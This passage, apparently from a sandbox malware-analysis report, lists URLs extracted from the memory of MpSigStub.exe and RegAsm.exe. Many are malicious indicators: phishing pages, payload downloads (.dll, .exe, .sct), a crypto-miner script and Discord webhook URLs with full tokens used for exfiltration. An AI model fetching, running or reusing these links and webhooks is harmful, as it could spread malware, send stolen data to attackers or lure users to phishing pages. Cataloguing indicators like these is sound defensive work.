    Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmpString found in binary or memory: https://corazonarquitectura.com/94reej6f3mr/lipa.html
    Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: https://courieroffice.net/wp-admin/whatsapp1.php
    Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmpString found in binary or memory: https://courieroffice.net/wp-content/post2.php
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: https://covid-19.freeworldimports.com/vendor/phpunit/phpunit/src/util/php/v/excelz/index.php
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpString found in binary or memory: https://crashpad.chromium.org/
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpString found in binary or memory: https://crashpad.chromium.org/x
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://creative-island.e-m2.net/wp-content/themes/creative_island/js/vc-composer/RUpDObeysEFp8.php
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://creativechigz.co.zw/themes/newexceltoosab.php
    Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmpString found in binary or memory: https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode.txt
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: https://crowandmonk.com/90pparcels.co.uk/wp-admin/maint/redirect/
    Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmpString found in binary or memory: https://crowandmonk.com/90pparcels.co.uk/wp-admin/maint/redirect/?jmoore
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpString found in binary or memory: https://crypto-loot.com/lib/miner.min.js
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: https://cryptotreasurytrust.com/vnV
    Source: RegAsm.exe, 0000000A.00000003.2601345289.00000000015A3000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: https://cut.ly/a2wiit8
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: https://cut.ly/nctboib
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/nbcoprl
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/tbcyxag
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/PROTOCOL.certkeys?rev=HEAD
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: https://d.lqw.me/xuiow/
    Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmpString found in binary or memory: https://d.symcb.com/cps0%
    Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmpString found in binary or memory: https://d.symcb.com/rpa0)
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: https://d2vb4fe3wqkxl3.cloudfront.net/opt.rtf
    Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmpString found in binary or memory: https://dahamarli.xyz
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: https://dailcarespop.ddnsking.com/audio/cmfuzhkuyxjta25ly2h0qhbyb3rpdml0as5jb20=
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://dancevida.com/css/app.css
    Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmpString found in binary or memory: https://darmatic.co.rs/ds/1502.gif
    Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmpString found in binary or memory: https://dashboard.imadeit.com.ng/ds/151120.gif
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: https://dasinvestment.us/ty/
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: https://dawnamae.000webhostapp.com/exel.phpmethod=
    Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmpString found in binary or memory: https://de.gsearch.com.de/api/update.sh
    Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmpString found in binary or memory: https://debatestage.com/wp-admin/css/colors/blue/reportmaersk.php
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: https://deenar.com/sashi/y29ylnn0b2x3awprqg5uaxauy29t
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: https://defineliving.in/
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: https://demottechamber.org/html
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://dev-thegentlemans.teoria.agency/owa/next.php
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: https://dev.null.vg/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://dev1.whoatemyI
    Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmpString found in binary or memory: https://devcellsegovapiwebapp.azurewebsites.net/
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: https://dhl24.com.uk/
    Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmpString found in binary or memory: https://diarnondfireplace.com/dobo/xxx.php?user=
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: https://dichthuatsnu.com/goodweb/pwofiles.php
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmpString found in binary or memory: https://diplomaticroll.com/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://diproelec.com.sv/moollll/excelzz
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/api/webhooks/
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/api/webhooks/770716126988599316/o7GXYebuPQzx7RQFUD4cTOPMq2gGicypOMyNpFVQsIb9qyVW
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/api/webhooks/850115118066040833/lcFHGcD2eUjv1zEJO_Ped6EAVU7W44L8X3chfyx9YoIb7YBS
    Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/api/webhooks/x
    Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmpString found in binary or memory: https://discordapp.com/api/webhooks/757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0
    Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmpString found in binary or memory: https://divelpid.my/wp-content/themes/monolit/woocommerce/global/aaie6jbhso9.php
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpString found in binary or memory: https://divineleverage.org/de.php
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: https://djdkduep62kz4nzx.onion.to/
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: https://dl.dropboxusercontent.com/s/e7q3947id2jl6ux/factura6.zip?dl=0
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: https://dl.dropboxusercontent.com/s/m6q5dhmjpfxes94/ps2.txt
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: https://dl.dropboxusercontent.com/u/611200196/scan637.pdf.htm
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: https://dlya-detey.site/emz/reportdhlnew2.php
    Source: RegAsm.exe, 0000000A.00000002.7229587939.0000000001561000.00000004.00000020.sdmpString found in binary or memory: https://doc-00-88-docs.googleusercontent.com/
    Source: RegAsm.exe, 0000000A.00000003.2601345289.00000000015A3000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-88-docs.googleusercontent.com/I
    Source: RegAsm.exe, 0000000A.00000003.2601345289.00000000015A3000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000003.2604940506.00000000015A3000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7230551454.0000000001592000.00000004.00000020.sdmpString found in binary or memory: https://doc-00-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9gljef6k
    Source: RegAsm.exe, 0000000A.00000002.7229587939.0000000001561000.00000004.00000020.sdmpString found in binary or memory: https://doc-00-88-docs.googleusercontent.com/f
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://docs-eight-sable.vercel.app/
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/document/d/e/2pacx-1vtrc0l1v7hke7ebcnmumoqomoajhb5togg63zkisb68sj3z7lcmv9ndk
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/feeds/default/private/full?v=3
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/uc
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/uc?id=1hajtdasfuta6vew8d5gjkd_bhnd3pwmc
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/viewer?url=%s&embedded=true
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: https://docs.healthmade.org//tc.js
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: https://donmilps.com/fex/?email=
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
    Source: RegAsm.exe, 0000000A.00000002.7228491604.0000000001518000.00000004.00000020.sdmp, RegAsm.exe, 0000000A.00000003.2601345289.00000000015A3000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7226801339.0000000001370000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u
    Source: RegAsm.exe, 0000000A.00000002.7228491604.0000000001518000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4uI
    Source: RegAsm.exe, 0000000A.00000003.2601345289.00000000015A3000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4uIaMa0_LSClw63POwk
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?id=1fxj2_ITnq1Yb6QbXw3HncRuwFAB8wN47&export=download
    Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmpString found in binary or memory: https://drp.su/
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: https://dumpitnow2138.com/
    Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmpString found in binary or memory: https://dumpster-server.herokuapp.com/manager/query
    Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmpString found in binary or memory: https://dynafivecon.com/ds/26.gif
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpString found in binary or memory: https://e3g564rtdfg.s3-eu-west-1.amazonaws.com/image2.png
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: https://ecombox.store/tbl_add.php
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpString found in binary or memory: https://ecosym.cl/firmas/wp-error.php
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: https://eeyhh567.s3.eu-west-3.amazonaws.com/image2.png
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: https://efishedo.info/?tag_id
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: https://elcoyotedesign.com/red1r3ct/base64email/zgfycmvulnboawxsaxbzqhnvdxrozxnzzxguywmudws=
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: https://eletrocoghi.com.br/drms/fert.html
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: https://elisegiordano.com/bwvsc2f5zwrac2hhcmtlewfzdwdhci5jb20=
    Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpString found in binary or memory: https://emvoips.eononass.xyz/?e=%25
    Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmpString found in binary or memory: https://en.czonediver.com/ds/0502.gif
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: https://english.cdfj.org/giremx.org.mx/excx/aw/passf.php?email=arai.kaoru
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: https://erpoweredent.at/3/zte.dll
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpString found in binary or memory: https://erythrocyte-gaskets.000webhostapp.com/ms/excelz/excelz/index.php?email=
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: https://esp.adnan.dev.hostingshouse.com/ds/151120.gif
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: https://esscorp.org/
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: https://etprimewomenawards.com/apply2/uploads/w_a/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://evolvingdesk.nl/GoogleAPI/vendor/symfony/polyfill-intl-normalizer/Resources/JsWPVLZw9qr9GFE.
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://excavationtrick.com/dir/
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: https://exploitbottom.com/dir/?code=
    Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmpString found in binary or memory: https://exploshot.com/24.gif
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: https://expressen.se/docprod/templates/bot_tjansteskrivelse.docx
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpString found in binary or memory: https://extranet.carlsonwagonlit.com/gdsscripts/
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: https://extraosseous.com/zik/
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpString found in binary or memory: https://f.coka.la/6wzxbj.sct
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: https://faithpays.sowetoinnovations.co.za/khro/php/continue1.php
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: https://faog.org.hk/scanner/overwatch.php
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: https://faxzmessageservice.club
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: https://fazadminmessae.info
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: https://fazalandsons.com.pk/wp-includes/ixr/class-ixr-base64.php
    Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmpString found in binary or memory: https://feedbackportal.download/ecm/ibm/3173379797/converter.dot
    Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmpString found in binary or memory: https://ferra.xyz/glsdil.php
    Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmpString found in binary or memory: https://fersite24.xyz/sa2234332324if3g4f23.php
    Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmpString found in binary or memory: https://filedropper.com/main/
    Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmpString found in binary or memory: https://fileshare24.top/3223if3g4f23.php
    Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmpString found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/converter.dot
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: https://find-your-profithere11.com/?m=1&o=hybpdzu&t=yrcrt&u=lb8k605
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/relaxdaysun.appspot.com/o/g%20ct%206%20yg-u%2ff%20cr%20y
    Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: https://flopyrhnd.tk/pr/lan.php
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: https://flyaircario.com/i/post.php
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: https://folkloreeconomy.com/next.php
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: https://formspree.io/f/
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: https://fpvtunes.binaryprotectors.com/msreal/jreside
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: https://fqe.short.gy/
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://fqe.short.gy/gclxo6
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpString found in binary or memory: https://logowrench.website/zdz0ptxdtonla.php
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: https://logs1186.xiti.com/
    Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmpString found in binary or memory: https://logupdate.herokuapp.com
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://longurl.in/ekdnl
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://longurl.in/htyul
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://longurl.in/mccwd
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://longurl.in/tllwu
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://longurl.in/welhl
    Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: https://lupoun.com/
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: https://lupoun.com/moon/
    Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmpString found in binary or memory: https://m3lloyellow.com/rodrich.php
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://macflypro.com/builds/data/
    Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: https://maersoul.com/vix/
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: https://mail.daum.net
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: https://mail.daum.net/login?url=http%3A%2F%2Fmail.daum.net%2F
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: https://mailsending.site/Happy_CS/happyFun.exe
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: https://main.iam.ad.ext.azure.com/api/
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpString found in binary or memory: https://malsay.myftp.biz/ck/business/index.php
    Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmpString found in binary or memory: https://mamulln.cl/kwi/?email=travis_phillips
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: https://manorrestaurantstrasburg.com/wp-zincludez/makdire/emonofhgh/wofjgjbledon/gen2021.php
    Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmpString found in binary or memory: https://marcostrombetta.com.br/ds/1802.Dc
    Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmpString found in binary or memory: https://marcostrombetta.com.br/ds/1802.gif
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: https://mareyell.org/sfexp/sfexpdbtrack/sfexss/sfexpress/source/index.php
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: https://massotherapielg.com/css/acrobat/login.micosoftonline.com/index.html
    Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmpString found in binary or memory: https://maxizoner.com/presentation.dll
    Source: MpSigStub.exe, 00000023.00000003.6341254844.0000028BD7D97000.00000004.00000001.sdmpString found in binary or memory: https://mazedecrypt.top/
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://md.jp-long.online/?e=robertm
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: https://md.jp-long.online/?e=vpetrillo
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpString found in binary or memory: https://md.klnmailbox.xyz/?e=
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://mdhov.ca/storage/mdhov/ca/next.php
    Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmpString found in binary or memory: https://mdspni.com/realm/send.php
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: https://meant.usa.cc/no/sharpoin/sharpoint/share/
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: https://mediadigital.site/class-vc.php
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpString found in binary or memory: https://megoseri.com/app.dll%/cvr78f2.tmp.cvr
    Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmpString found in binary or memory: https://mercados247.com/ds/1602.gif
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: https://message-read.iosmail-inbox.host/5c36dfff53edaf584b5d9262?qlpq7hq=&amp
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: https://meubackup.terra.com.br/index.php/s/4fwo4jtezhqnzdd/download
    Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmpString found in binary or memory: https://mhjyutrfgf.gb.net/grte544fc3/?vfegg5355=fvvbveg545
    Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmpString found in binary or memory: https://minhafinanca.com/wp-admin/css/colors/coffee/reportexcelindeed
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: https://minisnowhair.com/minisnw2/download2.php?f=htm-2-ads19u09ue11&u=22fc8bcc-db88-4ca7-9654-81ad4
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpString found in binary or memory: https://miscrsftonline.ml/blessing/policy.php
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: https://missglamourcosmeticos.com.br/ds/29.gif
    Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmpString found in binary or memory: https://mjstech1.com/06/lub.php
    Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmpString found in binary or memory: https://mmjobserver.com/aah/next.php
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: https://moegifts.com/ds/161120.gif
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: https://mollahossein.ir/cgi_bin/bgxlc3rlckblyxn0bwfulmnvbq==
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: https://mor32.s3-eu-west-1.amazonaws.com/image2.png
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: https://moralsss.com/office/office365/index.php
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://moranmus.com/adobe-vix/
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpString found in binary or memory: https://mort2021.s3-eu-west-1.amazonaws.com/image2.png
